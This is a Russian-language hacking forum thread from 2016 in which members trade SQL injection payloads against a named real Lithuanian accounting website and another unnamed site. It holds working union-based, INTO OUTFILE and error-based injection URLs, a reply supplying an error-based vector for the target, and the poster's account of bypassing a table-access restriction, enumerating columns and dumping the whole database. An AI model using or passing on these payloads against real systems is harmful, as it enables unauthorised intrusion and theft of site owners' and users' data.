HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Перезагрузить страницу Blind SQL или есть варианты?
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 24.08.2016, 13:59
labanec
Guest
Сообщений: n/a
Провел на форуме:
4710

Репутация: 0
По умолчанию
Здравствуйте. Если возможно, не убивайте их сайт.

Смотрел так, получил имя пользователя:

Код:
Code:
http://www.buhalteriams.lt/?id=42+union+select+user%28%29+INTO+OUTFILE+%271.php%27+--+1


Если делаю запрос

Код:
Code:
http://www.buhalteriams.lt/?id=42+union+select+table_schema+from+information_schema.tables--+1
, пишет, что локаль не совпадает(Illegal mix of collations for operation 'UNION').

Пробовал другие запросы (к примеру для вывода user()) - ошибок не выводит но и ничего не показывает.

Подскажите как можно обойти проблемму локали. И как заставить показывать результат запроса, если ошибок нету ? Спасибо.
 
Ответить с цитированием

  #2  
Старый 24.08.2016, 15:29
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию
А чем вас Error вектор не устраивает? http://www.buhalteriams.lt/?id=42+O...,database())),1,63)+,+ FLOOR(RAND(0)*2)))+--+
 
Ответить с цитированием

  #3  
Старый 24.08.2016, 15:38
labanec
Guest
Сообщений: n/a
Провел на форуме:
4710

Репутация: 0
По умолчанию
Моими слабыми знаниями Буду дальше копать, благодарю. Не до конца понимал как составлять запросы такого типа.
 
Ответить с цитированием

  #4  
Старый 25.08.2016, 23:25
labanec
Guest
Сообщений: n/a
Провел на форуме:
4710

Репутация: 0
По умолчанию
Тут другyю страничку за титьку щупаю. При инжекции кидает что селект запрос для information_schema.tables под запретом для текущего юзверя. По убогому функционалу сайтика, контента под другими БД юзверями не предвидется. Error вектор, как я понял, не поможет? Только угадать таблицы, конечно если их дадут селектить?
 
Ответить с цитированием

  #5  
Старый 27.08.2016, 22:49
labanec
Guest
Сообщений: n/a
Провел на форуме:
4710

Репутация: 0
По умолчанию
Вот так обошел запрет на селект запросы для текущего пользователя БД и содрал названиея ячеек таблиц. Для знатоков баян конечно же, для меня открытие

id=22+and(select 1 from(select count(*),concat((SELECT column_name FROM information_schema.columns limit 176,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Перебираем чиска (к примеру теперь 176) и тяням по одному названию ячейки. Названия ячеек лежат в куче, но по первому ID можно определить, что началась новая таблица. Почемуто concat_ws, concat, group_concat не смог использовать, база цеплялась к ошибке "колумсов больше 1".

Когда узнал названия таблиц а после названия столбцов, база была в кармане. Вот тогда и сгрупировать ячейки смог и всю базу содрал
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ